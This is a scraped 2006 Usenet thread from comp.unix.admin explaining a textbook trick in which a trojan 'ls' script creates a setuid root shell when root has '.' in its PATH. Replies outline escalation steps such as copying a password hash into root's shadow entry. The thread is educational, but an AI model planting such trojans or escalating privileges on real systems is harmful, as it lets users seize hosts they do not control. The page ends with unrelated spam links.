|
From: lovecreatesbeauty - view profile
Date: Fri, Mar 10 2006 10:08 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Remove | Report Abuse | Find messages by this author
The book `Practical UNIX & Internet Security, 3rd' mentioned a story
about an administrator who lost his root password. I wonder why the
administrator in the story lost the root password. Following is that
story.
One person wanted to be the root to do something. He found that the
root search path included the current directory . and wrote an
executable script named `ls' under current directory, the content was:
#!/bin/sh
cp /bin/sh ./stuff/junk/.superdude
chmod 4555 ./stuff/junk/.superdude
rm -f $0
exec /bin/ls ${1+"$@"}
He then ran following commands at command line:
%cd
%chmod 700 .
%touch ./-f
After that he said he could not delete one file with a strange name
under his directory to that administrator. The administrator came to
him and ran the ls command but found nothing (Question 1). The
administrator switched to root by `su' and then went to that person's
directory and ran ls again. At this step, the administrator exposed the
root password (Question 2) but he was not aware of it at that time. He
continued to delete one file with strange name for that person.
The result was that administrator can not login with root after that
person changed the root password.
--- --- ---
My questions are:
Question 1: Why the administrator can not list the content of the
directory at the first time, but can do it after su to root later.
Question 2: If the administrator did an exit after ran the second ls,
will he lose the root password again?
Sincerely,
lovecreatesbeauty
Reply
From: Dave Hinz - view profile
Date: Fri, Mar 10 2006 10:47 pm
Email: Dave Hinz <DaveH...@spamcop.net>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
On 10 Mar 2006 06:08:30 -0800, lovecreatesbeauty <lovecreatesbea...@gmail.com> wrote:
(snip social engineering example)
> The result was that administrator can not login with root after that
> person changed the root password.
> Question 1: Why the administrator can not list the content of the
> directory at the first time, but can do it after su to root later.
Because . was in his path, and he wasn't running the real ls, he was
running the one in the directory he was in. NEVER have . in root's
path, especially first.
> Question 2: If the administrator did an exit after ran the second ls,
> will he lose the root password again?
A good admin will take several precautions to avoid this sort of thing.
And of course, anyone pulling such a stunt is going to lose access at
least, so it's a self-regulating problem in several ways.
Reply Rate this post: Text for clearing space
From: hymie! - view profile
Date: Sat, Mar 11 2006 3:11 am
Email: hymie_@_lactose.homelinux.net (hymie!)
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
In our last episode, the evil Dr. Lacto had captured our hero,
"lovecreatesbeauty" <lovecreatesbea...@gmail.com>, who said:
>The book `Practical UNIX & Internet Security, 3rd' mentioned a story
>about an administrator who lost his root password. I wonder why the
>administrator in the story lost the root password. Following is that
>story.
You are slightly misunderstanding what happened.
>One person wanted to be the root to do something. He found that the
>root search path included the current directory . and wrote an
>executable script named `ls' under current directory, the content was:
> #!/bin/sh
> cp /bin/sh ./stuff/junk/.superdude
> chmod 4555 ./stuff/junk/.superdude
> rm -f $0
> exec /bin/ls ${1+"$@"}
>The
>administrator switched to root by `su' and then went to that person's
>directory and ran ls again. At this step, the administrator exposed the
>root password (Question 2) but he was not aware of it at that time.
The root password was not exposed. The fake "ls" script created a shell
that would run with root privileges. That gave the person root access
without needing the password.
hymie! http://www.smart.net/~hymowitz h...@lactose.homelinux.net
===============================================================================
Now that you've found another key, what are you going to play?
--John Lennon/Paul McCartney
===============================================================================
Reply Rate this post: Text for clearing space
From: Moe Trin - view profile
Date: Sat, Mar 11 2006 8:28 am
Email: ibupro...@painkiller.example.tld (Moe Trin)
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
On 10 Mar 2006, in the Usenet newsgroup comp.unix.admin, in article
<1141999709.948499.99...@e56g2000cwe.googlegroups.com>, lovecreatesbeauty wrote:
>The book `Practical UNIX & Internet Security, 3rd' mentioned a story
>about an administrator who lost his root password. I wonder why the
>administrator in the story lost the root password.
Because he had '.' (the current directory) in the front of his PATH.
>The result was that administrator can not login with root after that
>person changed the root password.
Yes
>Question 1: Why the administrator can not list the content of the
>directory at the first time, but can do it after su to root later.
%chmod 700 .
man sh (or what ever your shell is)
man chmod (or try it yourself and see what happens)
>Question 2: If the administrator did an exit after ran the second ls,
>will he lose the root password again?
Re-read the story. "A few minutes later, he couldn't get the new root
password." The game was won when the administrator ran this ls command.
Try this:
1. Create a file named 'ls' in your home directory, that contains
echo "Hello World"
2. Make this file executable with 'chmod 700 ls'
3. Change your PATH with the command
PATH=".:$PATH"
4. List the files in your directory - using the command 'ls'
5. Log out then log back in, and repeat 4.
Think what you just did, and think why it happened.
Old guy
Reply Rate this post: Text for clearing space
From: lovecreatesbeauty - view profile
Date: Sat, Mar 11 2006 12:01 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Remove | Report Abuse | Find messages by this author
hymie! wrote:
> In our last episode, the evil Dr. Lacto had captured our hero,
> The root password was not exposed. The fake "ls" script created a shell
> that would run with root privileges. That gave the person root access
> without needing the password.
I know the root's password was not exposed, but that person changed it
later.
After su to root and ran that dummy `ls', if that administrator exitd
completely, can the root's password be changed by that person?
If that administrator did not exit after su to root, then he will lose
the root's password without executing a special suid/sgid executable
script, am i right?
What real use does that dummy `ls' have?
Reply
From: Adam Price - view profile
Date: Sat, Mar 11 2006 3:06 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
On 10 Mar 2006 20:01:01 -0800, lovecreatesbeauty wrote:
- Hide quoted text -
- Show quoted text -
> hymie! wrote:
>> In our last episode, the evil Dr. Lacto had captured our hero,
>> The root password was not exposed. The fake "ls" script created a shell
>> that would run with root privileges. That gave the person root access
>> without needing the password.
> I know the root's password was not exposed, but that person changed it
> later.
> After su to root and ran that dummy `ls', if that administrator exitd
> completely, can the root's password be changed by that person?
> If that administrator did not exit after su to root, then he will lose
> the root's password without executing a special suid/sgid executable
> script, am i right?
> What real use does that dummy `ls' have?
The dummy verion of ls creates a copy of the /bin/sh executable called
./stuff/junk/.superdude
When cp makes a copy of the file, the file which is created is owned by the
user who executes the copy. In this case root.
The script then changes the permissions on that executable to 4555.
This has the efect of making the script readable and executable by anyone,
and also sets the SUID bit which has the effect of running the executable
as though it were run by the user who owns it.
So an ls -l of ./stuff/junk/.superdude would show something like...
sr-xr-xr-x 1 root users 451072 Mar 10 21:23 ./stuff/junk/.superdude
Then it removes itself (rm -f $0) and executes the real ls.
It only needs to get executed once by a user with root priviledge and the
game is over.
After the script has been executed by a superuser there is an executable
version of /bin/sh on the system which when executed by anyone will run
with an euid of 0.
The effect of that is that somone who runs ./stuff/junk/.superdude can then
act as root.
Does that explain it for you?
Adam
Reply Rate this post: Text for clearing space
From: Adam Price - view profile
Date: Sat, Mar 11 2006 3:28 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
On 10 Mar 2006 14:47:23 GMT, Dave Hinz wrote:
> On 10 Mar 2006 06:08:30 -0800, lovecreatesbeauty <lovecreatesbea...@gmail.com> wrote:
> (snip social engineering example)
>> The result was that administrator can not login with root after that
>> person changed the root password.
>> Question 1: Why the administrator can not list the content of the
>> directory at the first time, but can do it after su to root later.
Um I don't think you are answering the right question here...
The reason he couldn't list the content as a non root user was because the
'evil' user had set his directory permissions to 700.
This was intended to force the other guy into becoming root in order to
solve the problem.
Adam
Reply Rate this post: Text for clearing space
From: lovecreatesbeauty - view profile
Date: Sat, Mar 11 2006 8:22 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Remove | Report Abuse | Find messages by this author
Adam Price wrote:
> It only needs to get executed once by a user with root priviledge and the
> game is over.
> After the script has been executed by a superuser there is an executable
> version of /bin/sh on the system which when executed by anyone will run
> with an euid of 0.
> The effect of that is that somone who runs ./stuff/junk/.superdude can then
> act as root.
Great thanks for your help and detail explaining on the knowledge of
the script file.
I still have the question: Did the administrator run exit after he did
the task for that person?
1. If the administrator exited once (or twice, or set the terminal to
show `login:' prompt), can the next person act as root and change the
root's password?
2. If the administrator did not exit after su to root at all, then
anyone else can get the root privilege without that SUID script, am I
right?
Reply
From: Adam Price - view profile
Date: Sat, Mar 11 2006 10:49 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
On 11 Mar 2006 04:22:10 -0800, lovecreatesbeauty wrote:
- Hide quoted text -
- Show quoted text -
> Adam Price wrote:
>> It only needs to get executed once by a user with root priviledge and the
>> game is over.
>> After the script has been executed by a superuser there is an executable
>> version of /bin/sh on the system which when executed by anyone will run
>> with an euid of 0.
>> The effect of that is that somone who runs ./stuff/junk/.superdude can then
>> act as root.
> Great thanks for your help and detail explaining on the knowledge of
> the script file.
> I still have the question: Did the administrator run exit after he did
> the task for that person?
It doesn't matter. Once the script has run the shell file exists. We don't
know if he exited or not and we don't need to know.
> 1. If the administrator exited once (or twice, or set the terminal to
> show `login:' prompt), can the next person act as root and change the
> root's password?
Yes anyone who knows about the ...stuff/junk/.superdude can run it and get
root access.
> 2. If the administrator did not exit after su to root at all, then
> anyone else can get the root privilege without that SUID script, am I
> right?
If any user walks away without logging off then anyone who walks up to his
computer can use it as though they are that user.
If that user is logged in as root then anyone user can be root.
Without wishing to be rude, these are pretty fundimental things about
operating a computer and don't really have anything to do with being root
as such. You really do need to sit down and work through some of these
examples in your textbook and work out what is going on and why. It will
help you understand what is going on far more than the sort of help you
will get here.
As somone else said, read the man pages for cp, for chmod, for ls and rm,
then read about the exec system call and find out about suid.
Adam
Reply Rate this post: Text for clearing space
From: Dave Hinz - view profile
Date: Sun, Mar 12 2006 12:49 am
Email: Dave Hinz <DaveH...@spamcop.net>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
On Sat, 11 Mar 2006 07:28:20 +0000, Adam Price <adam+use...@pappnase.co.uk> wrote:
> On 10 Mar 2006 14:47:23 GMT, Dave Hinz wrote:
>> (snip social engineering example)
> Um I don't think you are answering the right question here...
I realize that I didn't answer the question he's asking, because I've
never seen him before and I don't know his motivation. But I gave
enough information to give the idea that . in the path is a problem and
playing games like this is a bad idea. Others have filled in the
details.
> The reason he couldn't list the content as a non root user was because the
> 'evil' user had set his directory permissions to 700.
> This was intended to force the other guy into becoming root in order to
> solve the problem.
Yup.
Reply Rate this post: Text for clearing space
From: lovecreatesbeauty - view profile
Date: Sun, Mar 12 2006 3:00 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Remove | Report Abuse | Find messages by this author
Adam Price wrote:
> The effect of that is that somone who runs ./stuff/junk/.superdude can then
> act as root.
Thank you. I think I get it, but can not act as root by runnig the
dummy version of ls in my demo:
$ passwd root
passwd: You may not view or modify password information for root.
$ ls -al
total 624
drwxr-xr-x 2 joshua joshua 4096 2006-03-12 14:50 .
drwxr-xr-x 3 joshua joshua 4096 2006-03-12 14:31 ..
-r-sr-xr-x 1 root root 625228 2006-03-12 14:50 .superdude
$ ./.superdude
.superdude-2.05b$ passwd root
passwd: You may not view or modify password information for root.
.superdude-2.05b$
Reply
From: Adam Price - view profile
Date: Sun, Mar 12 2006 4:29 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
On 11 Mar 2006 23:00:31 -0800, lovecreatesbeauty wrote:
- Hide quoted text -
- Show quoted text -
> Adam Price wrote:
>> The effect of that is that somone who runs ./stuff/junk/.superdude can then
>> act as root.
> Thank you. I think I get it, but can not act as root by runnig the
> dummy version of ls in my demo:
> $ passwd root
> passwd: You may not view or modify password information for root.
> $ ls -al
> total 624
> drwxr-xr-x 2 joshua joshua 4096 2006-03-12 14:50 .
> drwxr-xr-x 3 joshua joshua 4096 2006-03-12 14:31 ..
> -r-sr-xr-x 1 root root 625228 2006-03-12 14:50 .superdude
> $ ./.superdude
> .superdude-2.05b$ passwd root
> passwd: You may not view or modify password information for root.
> .superdude-2.05b$
That is probably just your passwd program being clever and realising the
difference between euid and uid (efective user id and real user id).
Try editing the password file with vipw.
Try just editing it with vi.
You should be able to make changes to the password file now, it's just that
many of the programs that are designed for editing the password file are
also likely know about this kind of hack.
It may be that your filesystem ignores the setuid bit on the filesystem
with the home-directories (this is another common security measure).
Have a bit of a play about, see what things you can change, see how you can
use them to get higher privs.
When have run ".superdude" try using the 'id' command and see what
userdetails you have.
Try using "su -" after you have run ".superdude"..
Adam
Reply Rate this post: Text for clearing space
From: lovecreatesbeauty - view profile
Date: Sun, Mar 12 2006 8:09 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Remove | Report Abuse | Find messages by this author
- Hide quoted text -
- Show quoted text -
Adam Price wrote:
> That is probably just your passwd program being clever and realising the
> difference between euid and uid (efective user id and real user id).
> Try editing the password file with vipw.
> Try just editing it with vi.
> You should be able to make changes to the password file now, it's just that
> many of the programs that are designed for editing the password file are
> also likely know about this kind of hack.
> It may be that your filesystem ignores the setuid bit on the filesystem
> with the home-directories (this is another common security measure).
> Have a bit of a play about, see what things you can change, see how you can
> use them to get higher privs.
> When have run ".superdude" try using the 'id' command and see what
> userdetails you have.
> Try using "su -" after you have run ".superdude"..
> Adam
I am happy that you confirmed my understanding ( Do I really understand
it correctly :-) ) on how the root privilege leaked and the root's
password was changed in the previous messages. But I do not know how to
change the /etc/passwd file according to your suggestion to demonstrate
that trick. I am a C programmer with not much experiences and knowledge
on UNIX or even C programming language. I hope to become an excellent
C/Unix programmer/administrator like extreme experts on these groups
like you.
The /usr/bin/passwd is a separate program but not a built-in one in
/bin/sh. Though I set SUID for /bin/sh, is /usr/bin/passwd aware of
this change? I ask this question because I read the Debian Linux's
online help and it says for example `cd' is a built-in command but
passwd is not such one (I upgrade bash to and make version 3.1 my login
shell in passwd file, but the /bin/sh is a link to bash 2.05.):
$ help
GNU bash, version 3.1.0(1)-release (i686-pc-linux-gnu)
These shell commands are defined internally. Type `help' to see this
list.
<snip>
cd [-L|-P] [dir]
Reply
From: Doug Freyburger - view profile
Date: Tues, Mar 14 2006 1:17 am
Email: "Doug Freyburger" <dfrey...@yahoo.com>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
lovecreatesbeauty wrote:
> I know the root's password was not exposed, but that person changed it
> later.
> After su to root and ran that dummy `ls', if that administrator exitd
> completely, can the root's password be changed by that person?
You're not describing the root password being stolen. That
wording suggests that the bad guy actually learned what the
root password was. That is not what happened. What happened
is root access without a password was given away.
You're describing root access being stolen, and thus the host
being stolen. That's different from the root password being
stolen. To steal the root password I need to find out what it
is. To steal root access I don't need to know what the root
password is. And once I have root access without a password
I can set the password to whatever I want.
> If that administrator did not exit after su to root, then he will lose
> the root's password without executing a special suid/sgid executable
> script, am i right?
> What real use does that dummy `ls' have?
The dummy ls was a script that creates a setuid shell and then
runs regular ls. This is a classic example in pretty much any
book on dealing with the root account. If this actually happened
then you need to fire the person with the dummy script. Have
Security walk them out immediately. And reload the entire host
from backup tapes that were made before the incident. Then
hire a professional to audit the system to see what prior damage
had been done.
The problem - A setuid shell runs as root for most purposes. As
such it can do nearly anything directly and can do anything
indirectly. So long as that setuid copy of the shell remains in
existance, anyone who can get to that copy has unlimited power
on that host.
In another post you noticed that running a setuid shell isn't
quite the same thing as really being root. There are specific
technical differences between having an effective UID of 0 from
running a setuid-root executible and having an actual UID of
0 from logging in as root. But that doesn't matter. Simple
programs like "cp", "chmod" and "mv" are all you need anyways.
So you can't change the root password with a setuid shell.
You can use "vi" to set passwords. That's how the bad guy
would do it anyways.
Reply Rate this post: Text for clearing space
From: lovecreatesbeauty - view profile
Date: Tues, Mar 14 2006 11:41 am
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Remove | Report Abuse | Find messages by this author
Doug Freyburger wrote:
> So you can't change the root password with a setuid shell.
> You can use "vi" to set passwords. That's how the bad guy
> would do it anyways.
Thank you. Adam suggested this vipw command and I see some other people
mentioned vipw is more secure also. I tried to change one newly added
user's passwd by vipw in my demo, but failed at login. I tried
following the two commands and deleted the password field between two
colons. The colons remained certainly. I think it meant that the user's
passwd was cleared or set to be blank. But I can not login this user
with a blank password.
$ su root -c 'vipw'
$ su root -c 'vipw -s'
user::1001:100::/home/user:
I know the password field in /etc/passwd is a placeholder and not a
real password to the corresponding user. But when I use 'vipw -s', I
see a strange string in the password field, is it the encrypted
password? If I change that password field, it will be decrypted to the
real password when login, we still can not know this real password. How
can I change password in this way? It's confused.
Reply
From: Adam Price - view profile
Date: Tues, Mar 14 2006 1:46 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
On 13 Mar 2006 19:41:58 -0800, lovecreatesbeauty wrote:
- Hide quoted text -
- Show quoted text -
> Doug Freyburger wrote:
>> So you can't change the root password with a setuid shell.
>> You can use "vi" to set passwords. That's how the bad guy
>> would do it anyways.
> Thank you. Adam suggested this vipw command and I see some other people
> mentioned vipw is more secure also. I tried to change one newly added
> user's passwd by vipw in my demo, but failed at login. I tried
> following the two commands and deleted the password field between two
> colons. The colons remained certainly. I think it meant that the user's
> passwd was cleared or set to be blank. But I can not login this user
> with a blank password.
> $ su root -c 'vipw'
> $ su root -c 'vipw -s'
> user::1001:100::/home/user:
> I know the password field in /etc/passwd is a placeholder and not a
> real password to the corresponding user. But when I use 'vipw -s', I
> see a strange string in the password field, is it the encrypted
> password? If I change that password field, it will be decrypted to the
> real password when login, we still can not know this real password. How
> can I change password in this way? It's confused.
Your system is obviously more secure than a basic unix system. Edit the
shadow password file, find your username, Copy the encrypted password,
Place it in the root entry. (Read the man page for passwd to find out which
fields are which). Now log in as root using YOUR password not the root
password.
Keep a copy of the shadow password file before you do this.
Or when you edit the password file, change your user id to 0. Then when you
log in as you change the root password with the passwd command.
Or Or Or...
Loads of ways to do this, but the point of the lesson in the book was to
remind you that if you leave . in roots PATH variable that you will run the
risk of losing control of the box, not to teach you how to hack your home
linux system.
This really isn' the place for hacking lessons (and I don't know where such
a place might be).
If you understand why this is a bad idea now then you can move on to the
next chapter in the book.
Adam
Reply Rate this post: Text for clearing space
From: lovecreatesbeauty - view profile
Date: Tues, Mar 14 2006 9:46 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Remove | Report Abuse | Find messages by this author
Adam Price wrote:
> Your system is obviously more secure than a basic unix system. Edit the
> shadow password file, find your username, Copy the encrypted password,
> Place it in the root entry. (Read the man page for passwd to find out which
> fields are which). Now log in as root using YOUR password not the root
> password.
> Keep a copy of the shadow password file before you do this.
Hello Adam. Thank you. I changed one non-root user's password by vipw
successfully under your help. I did this on Debian Linux 3.1, and it is
more secure as you mentioned. I will never have . in my PATH variable
at the first position, I will keep it in mind. I'll continue to go
through the rest of that book and read many other books. I have learnt
a lot from you. Thank you for the kindly help.
Reply
From: Doug Freyburger - view profile
Date: Tues, Mar 14 2006 11:41 pm
Email: "Doug Freyburger" <dfrey...@yahoo.com>
Groups: comp.unix.admin
Not yet ratedRating:
show options
Reply | Reply to Author | Forward | Print | Individual Message | Show original | Report Abuse | Find messages by this author
lovecreatesbeauty wrote:
> Doug Freyburger wrote:
> > So you can't change the root password with a setuid shell.
> > You can use "vi" to set passwords. That's how the bad guy
> > would do it anyways.
> Thank you. Adam suggested this vipw command and I see some other people
> mentioned vipw is more secure also.
vipw is more secure, does error checking, tries to lock out other
vipw users and so on. Among other things it's one of the programs
that tries to tell the difference between running setuid and being
logged in as root. It's one of the reasons the bad guys would
use vi instead.
> I tried to change one newly added
> user's passwd by vipw in my demo, but failed at login. I tried
> following the two commands and deleted the password field between two
> colons. The colons remained certainly. I think it meant that the user's
> passwd was cleared or set to be blank. But I can not login this user
> with a blank password.
Shadow file already discussed in another post.
Reply Rate this post:
|
相关推荐
Etymologically speaking, a fairy is something quite particular, related in kind to the naiads, or water nymphs, and while of the genus, we are sui generis. The word fairy is drawn from fay (Old French...
A 32-bit process is normally limited to addressing 2 gigabytes (GB) of memory, or 3 GB if the system was booted using the /3G boot switch even if there is more physical memory available. By leveraging...
Botnets, networks of malware-infected machines that are controlled by an adversary, are the root cause of a large number of security threats on the Internet. A particularly sophisticated and insidious...
第39章-何谓stolen bytes1
如何运行:python The_Stolen_Crown.py 视频演示: : Telaron 的国王主题:opengameart.org/content/the-kings-crowning Mekathratos 的城镇主题:opengameart.org/content/danza-del-bosque 巴特的主世界主题...
在Black Hat 2016大会上,两名比利时的安全研究人员展示了他们今年的研究成果...HEIST的全称是Encrypted Information can be Stolen through TCP-Windows。大体意思就是通过TCP-Windows协议可以窃取到加密的明文信息。
Take a look at how your personal data can be stolen by malicious attackers Understand the offensive maneuvers that hackers use Discover how to defend against threats Get to know the basic concepts...
See exactly how your smartphone's OS is put together (and where the seams are) Who This Book Is For This book is for anyone who wants to learn about Android security. Software developers, QA ...
rior to PCs for a long list of reasons, the truth of the matter is that a computer running Mac OS X isn’t inherently more secure than a computer running Windows (at least if it’s a recent version ...
Because the number of possible attacks is infinite, the only way we can be sure that a protocol is correct is by mathematical proof. Researchers have been attempting to prove the correctness of ...
- Bug fixed loading stolen keys from keygen database for command line version - Bug fixed loading relocation directory - Minor bugs fixed - Virtual Box: Fixed problem packaging feature is duplicated ...
Kali Linux Wireless Penetration Testing Beginner's Guide, Third Edition is suitable for anyone who wants to learn more about pentesting and how to understand and defend against the latest wireless ...
Protect your data from attack by using SQL Server technologies to implement a defense-in-depth strategy, performing threat analysis, and encrypting ...Mitigate the risk of credentials being stolen
- Bug fixed loading stolen keys from keygen database for command line version - Bug fixed loading relocation directory - Minor bugs fixed - Virtual Box: Fixed problem packaging feature is duplicated ...
This has increased the need to successfully retrieve this information from these devices if stolen or lost. Learning iOS Forensics will give you an insight into the forensics activities you can ...
加壳器 包括技术:Hook IAT, stolen codes,动态加载 编程语言:汇编。
EMV By Stolen_C++_EMV_EMVby.zip
渗透单位免费造